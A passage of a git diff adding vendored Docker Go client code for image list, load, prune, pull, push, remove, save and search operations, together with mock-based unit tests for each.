listCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + content, err := json.Marshal([]types.ImageSummary{ + { + ID: "image_id2", + }, + { + ID: "image_id2", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + images, err := client.ImageList(context.Background(), listCase.options) + if err != nil { + t.Fatal(err) + } + if len(images) != 2 { + t.Fatalf("expected 2 images, got %v", images) + } + } +} + +func TestImageListApiBefore125(t *testing.T) { + expectedFilter := "image:tag" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + query := req.URL.Query() + actualFilter := query.Get("filter") + if actualFilter != expectedFilter { + return nil, fmt.Errorf("filter not set in URL query properly. Expected '%s', got %s", expectedFilter, actualFilter) + } + actualFilters := query.Get("filters") + if actualFilters != "" { + return nil, fmt.Errorf("filters should have not been present, were with value: %s", actualFilters) + } + content, err := json.Marshal([]types.ImageSummary{ + { + ID: "image_id2", + }, + { + ID: "image_id2", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + version: "1.24", + } + + filters := filters.NewArgs() + filters.Add("reference", "image:tag") + + options := types.ImageListOptions{ + Filters: filters, + } + + images, err := client.ImageList(context.Background(), options) + if err != nil { + t.Fatal(err) + } + if len(images) != 2 { + t.Fatalf("expected 2 images, got %v", images) + } +} diff --git a/vendor/github.com/docker/docker/client/image_load.go b/vendor/github.com/docker/docker/client/image_load.go new file mode 100644 index 0000000000..77aaf1af36 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_load.go @@ -0,0 +1,30 @@ +package client + +import ( + "io" + "net/url" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" +) + +// ImageLoad loads an image in the docker host from the client host. +// It's up to the caller to close the io.ReadCloser in the +// ImageLoadResponse returned by this function. +func (cli *Client) ImageLoad(ctx context.Context, input io.Reader, quiet bool) (types.ImageLoadResponse, error) { + v := url.Values{} + v.Set("quiet", "0") + if quiet { + v.Set("quiet", "1") + } + headers := map[string][]string{"Content-Type": {"application/x-tar"}} + resp, err := cli.postRaw(ctx, "/images/load", v, input, headers) + if err != nil { + return types.ImageLoadResponse{}, err + } + return types.ImageLoadResponse{ + Body: resp.body, + JSON: resp.header.Get("Content-Type") == "application/json", + }, nil +} diff --git a/vendor/github.com/docker/docker/client/image_load_test.go b/vendor/github.com/docker/docker/client/image_load_test.go new file mode 100644 index 0000000000..68dc14ff22 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_load_test.go @@ -0,0 +1,95 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestImageLoadError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.ImageLoad(context.Background(), nil, true) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestImageLoad(t *testing.T) { + expectedURL := "/images/load" + expectedInput := "inputBody" + expectedOutput := "outputBody" + loadCases := []struct { + quiet bool + responseContentType string + expectedResponseJSON bool + expectedQueryParams map[string]string + }{ + { + quiet: false, + responseContentType: "text/plain", + expectedResponseJSON: false, + expectedQueryParams: map[string]string{ + "quiet": "0", + }, + }, + { + quiet: true, + responseContentType: "application/json", + expectedResponseJSON: true, + expectedQueryParams: map[string]string{ + "quiet": "1", + }, + }, + } + for _, loadCase := range loadCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + contentType := req.Header.Get("Content-Type") + if contentType != "application/x-tar" { + return nil, fmt.Errorf("content-type not set in URL headers properly. Expected 'application/x-tar', got %s", contentType) + } + query := req.URL.Query() + for key, expected := range loadCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + headers := http.Header{} + headers.Add("Content-Type", loadCase.responseContentType) + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(expectedOutput))), + Header: headers, + }, nil + }), + } + + input := bytes.NewReader([]byte(expectedInput)) + imageLoadResponse, err := client.ImageLoad(context.Background(), input, loadCase.quiet) + if err != nil { + t.Fatal(err) + } + if imageLoadResponse.JSON != loadCase.expectedResponseJSON { + t.Fatalf("expected a JSON response, was not.") + } + body, err := ioutil.ReadAll(imageLoadResponse.Body) + if err != nil { + t.Fatal(err) + } + if string(body) != expectedOutput { + t.Fatalf("expected %s, got %s", expectedOutput, string(body)) + } + } +} diff --git a/vendor/github.com/docker/docker/client/image_prune.go b/vendor/github.com/docker/docker/client/image_prune.go new file mode 100644 index 0000000000..5ef98b7f02 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_prune.go @@ -0,0 +1,36 @@ +package client + +import ( + "encoding/json" + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "golang.org/x/net/context" +) + +// ImagesPrune requests the daemon to delete unused data +func (cli *Client) ImagesPrune(ctx context.Context, pruneFilters filters.Args) (types.ImagesPruneReport, error) { + var report types.ImagesPruneReport + + if err := cli.NewVersionError("1.25", "image prune"); err != nil { + return report, err + } + + query, err := getFiltersQuery(pruneFilters) + if err != nil { + return report, err + } + + serverResp, err := cli.post(ctx, "/images/prune", query, nil, nil) + if err != nil { + return report, err + } + defer ensureReaderClosed(serverResp) + + if err := json.NewDecoder(serverResp.body).Decode(&report); err != nil { + return report, fmt.Errorf("Error retrieving disk usage: %v", err) + } + + return report, nil +} diff --git a/vendor/github.com/docker/docker/client/image_pull.go b/vendor/github.com/docker/docker/client/image_pull.go new file mode 100644 index 0000000000..3bffdb70e8 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_pull.go @@ -0,0 +1,46 @@ +package client + +import ( + "io" + "net/http" + "net/url" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/reference" +) + +// ImagePull requests the docker host to pull an image from a remote registry. +// It executes the privileged function if the operation is unauthorized +// and it tries one more time. +// It's up to the caller to handle the io.ReadCloser and close it properly. +// +// FIXME(vdemeester): there is currently used in a few way in docker/docker +// - if not in trusted content, ref is used to pass the whole reference, and tag is empty +// - if in trusted content, ref is used to pass the reference name, and tag for the digest +func (cli *Client) ImagePull(ctx context.Context, ref string, options types.ImagePullOptions) (io.ReadCloser, error) { + repository, tag, err := reference.Parse(ref) + if err != nil { + return nil, err + } + + query := url.Values{} + query.Set("fromImage", repository) + if tag != "" && !options.All { + query.Set("tag", tag) + } + + resp, err := cli.tryImageCreate(ctx, query, options.RegistryAuth) + if resp.statusCode == http.StatusUnauthorized && options.PrivilegeFunc != nil { + newAuthHeader, privilegeErr := options.PrivilegeFunc() + if privilegeErr != nil { + return nil, privilegeErr + } + resp, err = cli.tryImageCreate(ctx, query, newAuthHeader) + } + if err != nil { + return nil, err + } + return resp.body, nil +} diff --git a/vendor/github.com/docker/docker/client/image_pull_test.go b/vendor/github.com/docker/docker/client/image_pull_test.go new file mode 100644 index 0000000000..fe6bafed97 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_pull_test.go @@ -0,0 +1,199 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" +) + +func TestImagePullReferenceParseError(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, nil + }), + } + // An empty reference is an invalid reference + _, err := client.ImagePull(context.Background(), "", types.ImagePullOptions{}) + if err == nil || err.Error() != "repository name must have at least one component" { + t.Fatalf("expected an error, got %v", err) + } +} + +func TestImagePullAnyError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ImagePull(context.Background(), "myimage", types.ImagePullOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestImagePullStatusUnauthorizedError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")), + } + _, err := client.ImagePull(context.Background(), "myimage", types.ImagePullOptions{}) + if err == nil || err.Error() != "Error response from daemon: Unauthorized error" { + t.Fatalf("expected an Unauthorized Error, got %v", err) + } +} + +func TestImagePullWithUnauthorizedErrorAndPrivilegeFuncError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")), + } + privilegeFunc := func() (string, error) { + return "", fmt.Errorf("Error requesting privilege") + } + _, err := client.ImagePull(context.Background(), "myimage", types.ImagePullOptions{ + PrivilegeFunc: privilegeFunc, + }) + if err == nil || err.Error() != "Error requesting privilege" { + t.Fatalf("expected an error requesting privilege, got %v", err) + } +} + +func TestImagePullWithUnauthorizedErrorAndAnotherUnauthorizedError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")), + } + privilegeFunc := func() (string, error) { + return "a-auth-header", nil + } + _, err := client.ImagePull(context.Background(), "myimage", types.ImagePullOptions{ + PrivilegeFunc: privilegeFunc, + }) + if err == nil || err.Error() != "Error response from daemon: Unauthorized error" { + t.Fatalf("expected an Unauthorized Error, got %v", err) + } +} + +func TestImagePullWithPrivilegedFuncNoError(t *testing.T) { + expectedURL := "/images/create" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + auth := req.Header.Get("X-Registry-Auth") + if auth == "NotValid" { + return &http.Response{ + StatusCode: http.StatusUnauthorized, + Body: ioutil.NopCloser(bytes.NewReader([]byte("Invalid credentials"))), + }, nil + } + if auth != "IAmValid" { + return nil, fmt.Errorf("Invalid auth header : expected %s, got %s", "IAmValid", auth) + } + query := req.URL.Query() + fromImage := query.Get("fromImage") + if fromImage != "myimage" { + return nil, fmt.Errorf("fromimage not set in URL query properly. Expected '%s', got %s", "myimage", fromImage) + } + tag := query.Get("tag") + if tag != "latest" { + return nil, fmt.Errorf("tag not set in URL query properly. Expected '%s', got %s", "latest", tag) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("hello world"))), + }, nil + }), + } + privilegeFunc := func() (string, error) { + return "IAmValid", nil + } + resp, err := client.ImagePull(context.Background(), "myimage", types.ImagePullOptions{ + RegistryAuth: "NotValid", + PrivilegeFunc: privilegeFunc, + }) + if err != nil { + t.Fatal(err) + } + body, err := ioutil.ReadAll(resp) + if err != nil { + t.Fatal(err) + } + if string(body) != "hello world" { + t.Fatalf("expected 'hello world', got %s", string(body)) + } +} + +func TestImagePullWithoutErrors(t *testing.T) { + expectedURL := "/images/create" + expectedOutput := "hello world" + pullCases := []struct { + all bool + reference string + expectedImage string + expectedTag string + }{ + { + all: false, + reference: "myimage", + expectedImage: "myimage", + expectedTag: "latest", + }, + { + all: false, + reference: "myimage:tag", + expectedImage: "myimage", + expectedTag: "tag", + }, + { + all: true, + reference: "myimage", + expectedImage: "myimage", + expectedTag: "", + }, + { + all: true, + reference: "myimage:anything", + expectedImage: "myimage", + expectedTag: "", + }, + } + for _, pullCase := range pullCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + fromImage := query.Get("fromImage") + if fromImage != pullCase.expectedImage { + return nil, fmt.Errorf("fromimage not set in URL query properly. Expected '%s', got %s", pullCase.expectedImage, fromImage) + } + tag := query.Get("tag") + if tag != pullCase.expectedTag { + return nil, fmt.Errorf("tag not set in URL query properly. Expected '%s', got %s", pullCase.expectedTag, tag) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(expectedOutput))), + }, nil + }), + } + resp, err := client.ImagePull(context.Background(), pullCase.reference, types.ImagePullOptions{ + All: pullCase.all, + }) + if err != nil { + t.Fatal(err) + } + body, err := ioutil.ReadAll(resp) + if err != nil { + t.Fatal(err) + } + if string(body) != expectedOutput { + t.Fatalf("expected '%s', got %s", expectedOutput, string(body)) + } + } +} diff --git a/vendor/github.com/docker/docker/client/image_push.go b/vendor/github.com/docker/docker/client/image_push.go new file mode 100644 index 0000000000..8e73d28f56 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_push.go @@ -0,0 +1,54 @@ +package client + +import ( + "errors" + "io" + "net/http" + "net/url" + + "golang.org/x/net/context" + + distreference "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" +) + +// ImagePush requests the docker host to push an image to a remote registry. +// It executes the privileged function if the operation is unauthorized +// and it tries one more time. +// It's up to the caller to handle the io.ReadCloser and close it properly. +func (cli *Client) ImagePush(ctx context.Context, ref string, options types.ImagePushOptions) (io.ReadCloser, error) { + distributionRef, err := distreference.ParseNamed(ref) + if err != nil { + return nil, err + } + + if _, isCanonical := distributionRef.(distreference.Canonical); isCanonical { + return nil, errors.New("cannot push a digest reference") + } + + var tag = "" + if nameTaggedRef, isNamedTagged := distributionRef.(distreference.NamedTagged); isNamedTagged { + tag = nameTaggedRef.Tag() + } + + query := url.Values{} + query.Set("tag", tag) + + resp, err := cli.tryImagePush(ctx, distributionRef.Name(), query, options.RegistryAuth) + if resp.statusCode == http.StatusUnauthorized && options.PrivilegeFunc != nil { + newAuthHeader, privilegeErr := options.PrivilegeFunc() + if privilegeErr != nil { + return nil, privilegeErr + } + resp, err = cli.tryImagePush(ctx, distributionRef.Name(), query, newAuthHeader) + } + if err != nil { + return nil, err + } + return resp.body, nil +} + +func (cli *Client) tryImagePush(ctx context.Context, imageID string, query url.Values, registryAuth string) (serverResponse, error) { + headers := map[string][]string{"X-Registry-Auth": {registryAuth}} + return cli.post(ctx, "/images/"+imageID+"/push", query, nil, headers) +} diff --git a/vendor/github.com/docker/docker/client/image_push_test.go b/vendor/github.com/docker/docker/client/image_push_test.go new file mode 100644 index 0000000000..b52da8b8dc --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_push_test.go @@ -0,0 +1,180 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" +) + +func TestImagePushReferenceError(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, nil + }), + } + // An empty reference is an invalid reference + _, err := client.ImagePush(context.Background(), "", types.ImagePushOptions{}) + if err == nil || err.Error() != "repository name must have at least one component" { + t.Fatalf("expected an error, got %v", err) + } + // An canonical reference cannot be pushed + _, err = client.ImagePush(context.Background(), "repo@sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff", types.ImagePushOptions{}) + if err == nil || err.Error() != "cannot push a digest reference" { + t.Fatalf("expected an error, got %v", err) + } +} + +func TestImagePushAnyError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ImagePush(context.Background(), "myimage", types.ImagePushOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestImagePushStatusUnauthorizedError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")), + } + _, err := client.ImagePush(context.Background(), "myimage", types.ImagePushOptions{}) + if err == nil || err.Error() != "Error response from daemon: Unauthorized error" { + t.Fatalf("expected an Unauthorized Error, got %v", err) + } +} + +func TestImagePushWithUnauthorizedErrorAndPrivilegeFuncError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")), + } + privilegeFunc := func() (string, error) { + return "", fmt.Errorf("Error requesting privilege") + } + _, err := client.ImagePush(context.Background(), "myimage", types.ImagePushOptions{ + PrivilegeFunc: privilegeFunc, + }) + if err == nil || err.Error() != "Error requesting privilege" { + t.Fatalf("expected an error requesting privilege, got %v", err) + } +} + +func TestImagePushWithUnauthorizedErrorAndAnotherUnauthorizedError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")), + } + privilegeFunc := func() (string, error) { + return "a-auth-header", nil + } + _, err := client.ImagePush(context.Background(), "myimage", types.ImagePushOptions{ + PrivilegeFunc: privilegeFunc, + }) + if err == nil || err.Error() != "Error response from daemon: Unauthorized error" { + t.Fatalf("expected an Unauthorized Error, got %v", err) + } +} + +func TestImagePushWithPrivilegedFuncNoError(t *testing.T) { + expectedURL := "/images/myimage/push" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + auth := req.Header.Get("X-Registry-Auth") + if auth == "NotValid" { + return &http.Response{ + StatusCode: http.StatusUnauthorized, + Body: ioutil.NopCloser(bytes.NewReader([]byte("Invalid credentials"))), + }, nil + } + if auth != "IAmValid" { + return nil, fmt.Errorf("Invalid auth header : expected %s, got %s", "IAmValid", auth) + } + query := req.URL.Query() + tag := query.Get("tag") + if tag != "tag" { + return nil, fmt.Errorf("tag not set in URL query properly. Expected '%s', got %s", "tag", tag) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("hello world"))), + }, nil + }), + } + privilegeFunc := func() (string, error) { + return "IAmValid", nil + } + resp, err := client.ImagePush(context.Background(), "myimage:tag", types.ImagePushOptions{ + RegistryAuth: "NotValid", + PrivilegeFunc: privilegeFunc, + }) + if err != nil { + t.Fatal(err) + } + body, err := ioutil.ReadAll(resp) + if err != nil { + t.Fatal(err) + } + if string(body) != "hello world" { + t.Fatalf("expected 'hello world', got %s", string(body)) + } +} + +func TestImagePushWithoutErrors(t *testing.T) { + expectedOutput := "hello world" + expectedURLFormat := "/images/%s/push" + pullCases := []struct { + reference string + expectedImage string + expectedTag string + }{ + { + reference: "myimage", + expectedImage: "myimage", + expectedTag: "", + }, + { + reference: "myimage:tag", + expectedImage: "myimage", + expectedTag: "tag", + }, + } + for _, pullCase := range pullCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + expectedURL := fmt.Sprintf(expectedURLFormat, pullCase.expectedImage) + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + tag := query.Get("tag") + if tag != pullCase.expectedTag { + return nil, fmt.Errorf("tag not set in URL query properly. Expected '%s', got %s", pullCase.expectedTag, tag) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(expectedOutput))), + }, nil + }), + } + resp, err := client.ImagePush(context.Background(), pullCase.reference, types.ImagePushOptions{}) + if err != nil { + t.Fatal(err) + } + body, err := ioutil.ReadAll(resp) + if err != nil { + t.Fatal(err) + } + if string(body) != expectedOutput { + t.Fatalf("expected '%s', got %s", expectedOutput, string(body)) + } + } +} diff --git a/vendor/github.com/docker/docker/client/image_remove.go b/vendor/github.com/docker/docker/client/image_remove.go new file mode 100644 index 0000000000..839e5311c4 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_remove.go @@ -0,0 +1,31 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ImageRemove removes an image from the docker host. +func (cli *Client) ImageRemove(ctx context.Context, imageID string, options types.ImageRemoveOptions) ([]types.ImageDelete, error) { + query := url.Values{} + + if options.Force { + query.Set("force", "1") + } + if !options.PruneChildren { + query.Set("noprune", "1") + } + + resp, err := cli.delete(ctx, "/images/"+imageID, query, nil) + if err != nil { + return nil, err + } + + var dels []types.ImageDelete + err = json.NewDecoder(resp.body).Decode(&dels) + ensureReaderClosed(resp) + return dels, err +} diff --git a/vendor/github.com/docker/docker/client/image_remove_test.go b/vendor/github.com/docker/docker/client/image_remove_test.go new file mode 100644 index 0000000000..7b004f70e6 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_remove_test.go @@ -0,0 +1,95 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestImageRemoveError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.ImageRemove(context.Background(), "image_id", types.ImageRemoveOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestImageRemove(t *testing.T) { + expectedURL := "/images/image_id" + removeCases := []struct { + force bool + pruneChildren bool + expectedQueryParams map[string]string + }{ + { + force: false, + pruneChildren: false, + expectedQueryParams: map[string]string{ + "force": "", + "noprune": "1", + }, + }, { + force: true, + pruneChildren: true, + expectedQueryParams: map[string]string{ + "force": "1", + "noprune": "", + }, + }, + } + for _, removeCase := range removeCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "DELETE" { + return nil, fmt.Errorf("expected DELETE method, got %s", req.Method) + } + query := req.URL.Query() + for key, expected := range removeCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + b, err := json.Marshal([]types.ImageDelete{ + { + Untagged: "image_id1", + }, + { + Deleted: "image_id", + }, + }) + if err != nil { + return nil, err + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + imageDeletes, err := client.ImageRemove(context.Background(), "image_id", types.ImageRemoveOptions{ + Force: removeCase.force, + PruneChildren: removeCase.pruneChildren, + }) + if err != nil { + t.Fatal(err) + } + if len(imageDeletes) != 2 { + t.Fatalf("expected 2 deleted images, got %v", imageDeletes) + } + } +} diff --git a/vendor/github.com/docker/docker/client/image_save.go b/vendor/github.com/docker/docker/client/image_save.go new file mode 100644 index 0000000000..ecac880a32 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_save.go @@ -0,0 +1,22 @@ +package client + +import ( + "io" + "net/url" + + "golang.org/x/net/context" +) + +// ImageSave retrieves one or more images from the docker host as an io.ReadCloser. +// It's up to the caller to store the images and close the stream. +func (cli *Client) ImageSave(ctx context.Context, imageIDs []string) (io.ReadCloser, error) { + query := url.Values{ + "names": imageIDs, + } + + resp, err := cli.get(ctx, "/images/get", query, nil) + if err != nil { + return nil, err + } + return resp.body, nil +} diff --git a/vendor/github.com/docker/docker/client/image_save_test.go b/vendor/github.com/docker/docker/client/image_save_test.go new file mode 100644 index 0000000000..8f0cf88640 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_save_test.go @@ -0,0 +1,58 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "reflect" + "testing" + + "golang.org/x/net/context" + + "strings" +) + +func TestImageSaveError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ImageSave(context.Background(), []string{"nothing"}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server error, got %v", err) + } +} + +func TestImageSave(t *testing.T) { + expectedURL := "/images/get" + client := &Client{ + client: newMockClient(func(r *http.Request) (*http.Response, error) { + if !strings.HasPrefix(r.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + } + query := r.URL.Query() + names := query["names"] + expectedNames := []string{"image_id1", "image_id2"} + if !reflect.DeepEqual(names, expectedNames) { + return nil, fmt.Errorf("names not set in URL query properly. Expected %v, got %v", names, expectedNames) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("response"))), + }, nil + }), + } + saveResponse, err := client.ImageSave(context.Background(), []string{"image_id1", "image_id2"}) + if err != nil { + t.Fatal(err) + } + response, err := ioutil.ReadAll(saveResponse) + if err != nil { + t.Fatal(err) + } + saveResponse.Close() + if string(response) != "response" { + t.Fatalf("expected response to contain 'response', got %s", string(response)) + } +} diff --git a/vendor/github.com/docker/docker/client/image_search.go b/vendor/github.com/docker/docker/client/image_search.go new file mode 100644 index 0000000000..b0fcd5c23d --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_search.go @@ -0,0 +1,51 @@ +package client + +import ( + "encoding/json" + "fmt" + "net/http" + "net/url" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/registry" + "golang.org/x/net/context" +) + +// ImageSearch makes the docker host to search by a term in a remote registry. +// The list of results is not sorted in any fashion. +func (cli *Client) ImageSearch(ctx context.Context, term string, options types.ImageSearchOptions) ([]registry.SearchResult, error) { + var results []registry.SearchResult + query := url.Values{} + query.Set("term", term) + query.Set("limit", fmt.Sprintf("%d", options.Limit)) + + if options.Filters.Len() > 0 { + filterJSON, err := filters.ToParam(options.Filters) + if err != nil { + return results, err + } + query.Set("filters", filterJSON) + } + + resp, err := cli.tryImageSearch(ctx, query, options.RegistryAuth) + if resp.statusCode == http.StatusUnauthorized && options.PrivilegeFunc != nil { + newAuthHeader, privilegeErr := options.PrivilegeFunc() + if privilegeErr != nil { + return results, privilegeErr + } + resp, err = cli.tryImageSearch(ctx, query, newAuthHeader) + } + if err != nil { + return results, err + } + + err = json.NewDecoder(resp.body).Decode(&results) + ensureReaderClosed(resp) + return results, err +} + +func (cli *Client) tryImageSearch(ctx context.Context, query url.Values, registryAuth string) (serverResponse, error) { + headers := map[string][]string{"X-Registry-Auth": {registryAuth}} + return cli.get(ctx, "/images/search", query, headers) +} diff --git a/vendor/github.com/docker/docker/client/image_search_test.go b/vendor/github.com/docker/docker/client/image_search_test.go new file mode 100644 index 0000000000..b17bbd8343 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_search_test.go @@ -0,0 +1,165 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "encoding/json" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/registry" +) + +func TestImageSearchAnyError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ImageSearch(context.Background(), "some-image", types.ImageSearchOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestImageSearchStatusUnauthorizedError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")), + } + _, err := client.ImageSearch(context.Background(), "some-image", types.ImageSearchOptions{}) + if err == nil || err.Error() != "Error response from daemon: Unauthorized error" { + t.Fatalf("expected an Unauthorized Error, got %v", err) + } +} + +func TestImageSearchWithUnauthorizedErrorAndPrivilegeFuncError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")), + } + privilegeFunc := func() (string, error) { + return "", fmt.Errorf("Error requesting privilege") + } + _, err := client.ImageSearch(context.Background(), "some-image", types.ImageSearchOptions{ + PrivilegeFunc: privilegeFunc, + }) + if err == nil || err.Error() != "Error requesting privilege" { + t.Fatalf("expected an error requesting privilege, got %v", err) + } +} + +func TestImageSearchWithUnauthorizedErrorAndAnotherUnauthorizedError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusUnauthorized, "Unauthorized error")), + } + privilegeFunc := func() (string, error) { + return "a-auth-header", nil + } + _, err := client.ImageSearch(context.Background(), "some-image", types.ImageSearchOptions{ + PrivilegeFunc: privilegeFunc, + }) + if err == nil || err.Error() != "Error response from daemon: Unauthorized error" { + t.Fatalf("expected an Unauthorized Error, got %v", err) + } +} + +func TestImageSearchWithPrivilegedFuncNoError(t *testing.T) { + expectedURL := "/images/search" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + auth := req.Header.Get("X-Registry-Auth") + if auth == "NotValid" { + return &http.Response{ + StatusCode: http.StatusUnauthorized, + Body: ioutil.NopCloser(bytes.NewReader([]byte("Invalid credentials"))), + }, nil + } + if auth != "IAmValid" { + return nil, fmt.Errorf("Invalid auth header : expected 'IAmValid', got %s", auth) + } + query := req.URL.Query() + term := query.Get("term") + if term != "some-image" { + return nil, fmt.Errorf("term not set in URL query properly. Expected 'some-image', got %s", term) + } + content, err := json.Marshal([]registry.SearchResult{ + { + Name: "anything", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + privilegeFunc := func() (string, error) { + return "IAmValid", nil + } + results, err := client.ImageSearch(context.Background(), "some-image", types.ImageSearchOptions{ + RegistryAuth: "NotValid", + PrivilegeFunc: privilegeFunc, + }) + if 